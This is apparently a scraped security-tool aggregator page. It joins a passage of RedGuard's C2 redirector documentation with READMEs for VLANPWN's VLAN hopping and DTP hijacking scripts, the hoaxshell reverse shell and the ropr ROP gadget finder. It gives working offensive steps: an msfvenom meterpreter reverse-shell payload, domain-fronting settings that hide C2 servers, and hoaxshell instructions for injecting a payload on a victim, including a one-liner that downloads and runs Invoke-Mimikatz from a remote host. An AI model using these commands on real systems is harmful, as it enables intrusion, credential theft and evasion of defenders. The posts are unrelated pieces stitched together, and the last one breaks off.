If you directly access the port of the reverse proxy, the interception rule will be triggered. Here you can see the root directory of the client request through the output log, but because the request process does not carry the requested credentials, that is, the correct HOST request header So the basic interception rule is triggered, and the traffic is redirected to https://360.net

Here, in order to facilitate the display of the output effect, the actual use can be run in the background through nohup ./RedGuard &.


{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

It is not difficult to see from the above slice that 360.net corresponds to the proxy to the local port 8080, 360.com points to the local port 4433, and corresponds to the difference in the HTTP protocol used. In the subsequent online, you need to pay attention to the protocol of the listener. The type needs to be consistent with the one set here, and set the corresponding HOST request header.


As shown in the figure above, in the case of unauthorized access, the response information we get is also the return information of the redirected site.

interception method

In the above basic interception case, the default interception method is used, that is, the illegal traffic is intercepted by redirection. By modifying the configuration file, we can change the interception method and the redirected site URL. In fact, this The other way is a redirect, which might be more aptly described as hijacking, cloning, since the response status code returned is 200, and the response is taken from another website to mimic the cloned/hijacked website as closely as possible.

Invalid packets can be misrouted according to three strategies:

  • reset: Terminate the TCP connection immediately.
  • proxy: Get a response from another website to mimic the cloned/hijacked website as closely as possible.
  • redirect: redirect to the specified website and return HTTP status code 302, there is no requirement for the redirected website.
# RedGuard interception action: redirect / rest / proxy (Hijack HTTP Response)
drop_action = proxy
# URL to redirect to
Redirect = https://360.net

Redirect = URL in the configuration file points to the hijacked URL address. RedGuard supports "hot change", which means that while the tool is running in the background through nohup, we can still modify the configuration file. The content is started and stopped in real time.

./RedGuard -u --drop true

Note that when modifying the configuration file through the command line. The -u option should not be too small, otherwise the configuration file cannot be modified successfully. If you need to restore the default configuration file settings, you only need to enter ./RedGuard -u.

Another interception method is DROP, which directly closes the HTTP communication response and is enabled by setting DROP = true. The specific interception effect is as follows:


It can be seen that the C2 pre-flow control directly responds to illegal requests without the HTTP response code. In the detection of cyberspace mapping, the DROP method can achieve the function of hiding the opening of ports. The specific effect can be seen in the following case. analyze.

Proxy port modification

In fact, it is easy to understand here. The configuration of the following two parameters in the configuration file realizes the effect of changing the reverse proxy port. It is recommended to use the default port on the premise of not conflicting with the current server port. If it must be modified, then pay attention to the : of the parameter value not to be missing

# HTTPS Reverse proxy port
Port_HTTPS = :443
# HTTP Reverse proxy port
Port_HTTP = :80

RedGuard logs

The blue team tracing behavior is analyzed through the interception log of the target request, which can be used to track peer connection events/problems. The log file is generated in the directory where RedGuard is running, file name: RedGuard.log.

ย 

RedGuard Obtain the real IP address

This section describes how to configure RG to obtain the real IP address of a request. You only need to add the following configuration to the profile of the C2 device, that is, to obtain the real IP address of the target through the request header X-Forwarded-For.

http-config {
set trust_x_forwarded_for "true";
}

Request geographic restrictions

The configuration method takes AllowLocation = Jinan, Beijing as an example. It is worth noting here that RedGuard provides two APIs for IP attribution anti-check, one for domestic users and the other for overseas users. Dynamically assign which API to use. If the target is in China, enter Chinese for the set region. Otherwise, enter English place names. It is recommended that domestic users use Chinese names. In this way, the accuracy of the attribution found and the response speed of the API are both is the best choice.

P.S. Domestic users, do not use AllowLocation = Jinan,beijing this way! It doesn't make much sense, the first character of the parameter value determines which API to use!

# IP address owning restrictions example:AllowLocation = ๅฑฑไธœ,ไธŠๆตท,ๆญๅทž or shanghai,beijing
AllowLocation = *

ย 

Before deciding to restrict the region, you can manually query the IP address by the following command.

./RedGuard --ip 111.14.218.206
./RedGuard --ip 111.14.218.206 --location shandong # Use overseas API to query

Here we set to allow only the Shandong region to go online

ย 

Legit traffic:

ย 

Illegal request area:

ย 

Regarding the launch of geographical restrictions, it may be more practical in the current offensive and defensive drills. Basically, the targets of provincial and municipal protection network restrictions are in designated areas, and the traffic requested by other areas can naturally be ignored, and the function of RedGuard is Not only can a single region be restricted, but multiple online regions can be restricted based on provinces and cities, and traffic requested by other regions can be intercepted.

Blocking based on whitelist

In addition to the built-in blacklist of security vendor IPs in RedGuard, we can also restrict according to the whitelist. In fact, I also suggest that when doing web management, we can restrict the addresses of the online IPs according to the whitelist, so as to divide multiple IPs way of address.

# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1
AllowIP = 127.0.0.1

ย 

As shown in the figure above, we only allow 127.0.0.1 to go online, then the request traffic of other IPs will be intercepted.

Block based on time period

This function is more interesting. Setting the following parameter values in the configuration file means that the traffic control facility can only go online from 8:00 am to 9:00 pm. The specific application scenario here is that during the specified attack time, we allow communication with C2 Traffic interacts, and remains silent at other times. This also allows the red teams to get a good night's sleep without worrying about some blue team on the night shift being bored to analyze your Trojan and then wake up to something indescribable, hahaha.

# Limit the time of requests example: AllowTime = 8:00 - 16:00
AllowTime = 8:00 - 21๏ผš00


Malleable Profile

RedGuard uses the Malleable C2 profile. It then parses the provided malleable configuration file section to understand the contract and pass only those inbound requests that satisfy it, while misleading others. Parts such as http-stager, http-get and http-post and their corresponding uris, headers, User-Agent etc. are used to distinguish legitimate beacon requests from irrelevant Internet noise or IR/AV/EDR Out-of-bounds packet.

# C2 Malleable File Path
MalleableFile = /root/cobaltstrike/Malleable.profile


The profile written by ้ฃŽ่ตท is recommended to use:

https://github.com/wikiZ/CobaltStrike-Malleable-Profile

0x04 Case Study

Cyberspace Search Engine

As shown in the figure below, when our interception rule is set to DROP, the spatial mapping system probe will probe the / directory of our reverse proxy port several times. In theory, the request packet sent by mapping is faked as normal traffic. Show. But after several attempts, because the characteristics of the request packet do not meet the release requirements of RedGuard, they are all responded by Close HTTP. The final effect displayed on the surveying and mapping platform is that the reverse proxy port is not open.

ย 

The traffic shown in the figure below means that when the interception rule is set to Redirect, we will find that when the mapping probe receives a response, it will continue to scan our directory. UserAgent is random, which seems to be in line with normal traffic requests, but both successfully blocked.


Mapping Platform - Hijack Response Intercept Mode Effect:


Surveying and mapping platform - effect of redirection interception:


Domain fronting

RedGuard supports Domain fronting. In my opinion, there are two forms of presentation. One is to use the traditional Domain fronting method, which can be achieved by setting the port of our reverse proxy in the site-wide acceleration back-to-source address. On the original basis, the function of traffic control is added to the domain fronting, and it can be redirected to the specified URL according to the setting we set to make it look more real. It should be noted that the RedGuard setting of the HTTPS HOST header must be consistent with the domain name of the site-wide acceleration.


In individual combat, I suggest that the above method can be used, and in team tasks, it can also be achieved by self-built "Domain fronting".

ย 

In the self-built Domain fronting, keep multiple reverse proxy ports consistent, and the HOST header consistently points to the real C2 server listening port of the backend. In this way, our real C2 server can be well hidden, and the server of the reverse proxy can only open the proxy port by configuring the firewall.


This can be achieved through multiple node servers, and configure multiple IPs of our nodes in the CS listener HTTPS online IP.

Edge Node

RedGuard 22.08.03 updated the edge host online settings - custom intranet host interaction domain name, and the edge host uses the domain front CDN node interaction. The asymmetry of the information exchanged between the two hosts is achieved, making it more difficult to trace the source and make it difficult to check.


CobaltStrike

If there is a problem with the above method, the actual online C2 server cannot be directly intercepted by the firewall, because the actual load balancing request in the reverse proxy is made by the IP of the cloud server manufacturer.

If it is a single soldier, we can set an interception strategy on the cloud server firewall.


Then set the address pointed to by the proxy to https://127.0.0.1:4433.

{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

And because our basic verification is based on the HTTP HOST request header, what we see in the HTTP traffic is also the same as the domain fronting method, but the cost is lower, and only one cloud server is needed.

ย 

For the listener settings, the online port is set to the RedGuard reverse proxy port, and the listening port is the actual online port of the local machine.

Metasploit

Generates Trojan

$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com 
-f exe -o ~/path/to/payload.exe

Of course, as a domain fronting scenario, you can also configure your LHOST to use any domain name of the manufacturer's CDN, and pay attention to setting the HttpHostHeader to match RedGuard.

setg OverrideLHOST 360.com
setg OverrideLPORT 443
setg OverrideRequestHost true

It is important to note that the OverrideRequestHost setting must be set to true. This is due to a quirk in the way Metasploit handles incoming HTTP/S requests by default when generating configuration for staging payloads. By default, Metasploit uses the incoming request's Host header value (if present) for second-stage configuration instead of the LHOST parameter. Therefore, the build stage is configured to send requests directly to your hidden domain name because CloudFront passes your internal domain in the Host header of forwarded requests. This is clearly not what we are asking for. Using the OverrideRequestHost configuration value, we can force Metasploit to ignore the incoming Host header and instead use the LHOST configuration value pointing to the origin CloudFront domain.

The listener is set to the actual line port that matches the address RedGuard actually forwards to.

ย 

RedGuard received the request:


0x05 Loading

Thank you for your support. RedGuard will continue to improve and update it. I hope that RedGuard can be known to more security practitioners. The tool refers to the design ideas of RedWarden.

**We welcome everyone to put forward your needs, RedGuard will continue to grow and improve in these needs! **

About the developer ้ฃŽ่ตท related articles:https://www.anquanke.com/member.html?memberId=148652

2022Kcon Author of the weapon spectrum of the hacker conference

The 10th ISC Internet Security Conference Advanced Offensive and Defense Forum "C2 Front Flow Control" topic

https://isc.n.cn/m/pages/live/index?channel_id=iscyY043&ncode=UR6KZ&room_id=1981905&server_id=785016&tab_id=253

Analysis of cloud sandbox flow identification technology

https://www.anquanke.com/post/id/277431

Realization of JARM Fingerprint Randomization Technology

https://www.anquanke.com/post/id/276546

Kunyu: https://github.com/knownsec/Kunyu

้ฃŽ่ตทไบŽ้’่ไน‹ๆœซ๏ผŒๆตชๆˆไบŽๅพฎๆพœไน‹้—ดใ€‚

0x06 Community

If you have any questions or requirements, you can submit an issue under the project, or contact the tool author by adding WeChat.




VLANPWN - VLAN Attacks Toolkit

By: Zion3R
16 August 2022 at 12:30


VLAN attacks toolkit

DoubleTagging.py - This tool is designed to carry out a VLAN Hopping attack. As a result of injection of a frame with two 802.1Q tags, a test ICMP request will also be sent.

DTPHijacking.py - A script for conducting a DTP Switch Spoofing/Hijacking attack. Sends a malicious DTP-Desirable frame, as a result of which the attacker's machine becomes a trunk channel. The impact of this attack is that you can bypass the segmentation of VLAN networks and see all the traffic of VLAN networks.

python3 DoubleTagging.py --help

.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%S
SS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%S
SS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
SS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%S
SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
`:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'

VLAN Double Tagging inject tool. Jump into another VLAN!

Author: @necreas1ng, <[email protected]>

usage: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKER

options:
-h, --help show this help message and exit
--interface INTERFACE
Specify your network interface
--nativevlan NATIVEVLAN
Specify the Native VLAN ID
--targetvlan TARGETVLAN
Specify the target VLAN ID for attack
--victim VICTIM Specify the target IP
--attacker ATTACKER Specify the attacker IP

Example:

python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim 10.10.20.24 --attacker 10.10.10.54
python3 DTPHijacking.py --help

.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%S
SS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%S
SS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
SS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%S
SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
`:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'

DTP Switch Hijacking tool. Become a trunk!

Author: @necreas1ng, <[email protected]>

usage: DTPHijacking.py [-h] --interface INTERFACE

options:
-h, --help show this help message and exit
--interface INTERFACE
Specify your network interface

Example:

python3 DTPHijacking.py --interface eth0


Hoaxshell - An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic

By: Zion3R
17 August 2022 at 12:30


hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates it's own PowerShell payload and it supports encryption (ssl).

So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots).


Video Presentation

Screenshots

Find more screenshots here.

Installation

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Usage

Basic shell session over http

sudo python3 hoaxshell.py -s <your_ip>

When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject on the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the "rawpayload" prompt command or start hoaxshell with the -r argument. After the payload has been executed on the victim, you'll be able to run PowerShell commands against it.

Encrypted shell session (https):

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

The generated PowerShell payload will be longer in length because of an additional block of code that disables the ssl certificate validation.

Grab session mode

In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.

sudo python3 hoaxshell.py -s <your_ip> -g

Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).

Limitations

The shell is going to hang if you execute a command that initiates an interactive session. Example:

# this command will execute succesfully and you will have no problem: 
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell

# In the same manner, you won't have a problem executing this:
> cmd /c dir /a

# But this will cause your hoaxshell to hang:
> cmd.exe

So, if you for example would like to run mimikatz throught hoaxshell you would need to invoke the commands:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context.

Future

I am currently working on some auxiliary-type prompt commands to automate parts of host enumeration.



Ropr - A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative

By: Zion3R
18 August 2022 at 12:30


ropr is a blazing fast multithreaded ROP Gadget finder

What is a ROP Gadget?

ROP (Return Oriented Programming) Gadgets are small snippets of a few assembly instructions typically ending in a ret instruction which already exist as executable code within each binary or library. These gadgets may be used for binary exploitation and to subvert vulnerable executables.

When the addresses of many ROP Gadgets are written into a buffer we have formed a ROP Chain. If an attacker can move the stack pointer into this ROP Chain then control can be completely transferred to the attacker.

Most executables contain enough gadgets to write a turing-complete ROP Chain. For those that don't, one can always use dynamic libraries contained in the same address-space such as libc once we know their addresses.

The beauty of using ROP Gadgets is that no new executable code needs to be written anywhere - an attacker may achieve their objective using only the code that already exists in the program.


How do I use a ROP Gadget?

Typically the first requirement to use ROP Gadgets is to have a place to write your ROP Chain - this can be any readable buffer. Simply write the addresses of each gadget you would like to use into this buffer. If the buffer is too small there may not be enough room to write a long ROP Chain into and so an attacker should be careful to craft their ROP Chain to be efficient enough to fit into the space available.

The next requirement is to be able to control the stack - This can take the form of a stack overflow - which allows the ROP Chain to be written directly under the stack pointer, or a "stack pivot" - which is usually a single gadget which moves the stack pointer to the rest of the ROP Chain.

Once the stack pointer is at the start of your ROP Chain, the next ret instruction will trigger the gadgets to be excuted in sequence - each using the next as its return address on its own stack frame.

It is also possible to add function poitners into a ROP Chain - taking care that function arguments be supplied after the next element of the ROP Chain. This is typically combined with a "pop gadget", which pops the arguments off the stack in order to smoothly transition to the next gadget after the function arguments.

How do I install ropr?

  • Requires cargo (the rust build system)

Easy install:

cargo install ropr

the application will install to ~/.cargo/bin

From source:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo build --release

the resulting binary will be located in target/release/ropr

Alternatively:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo install --path .

the application will install to ~/.cargo/bin

How do I use ropr?

For example if I was looking for a way to fill rax with a value from another register I may choose to filter by the regex ^mov eax, ...;:
Now I can add some filters to the command line for the highest quality results:
Now I have a good mov gadget candidate at address 0x00052252

โŒ
โŒ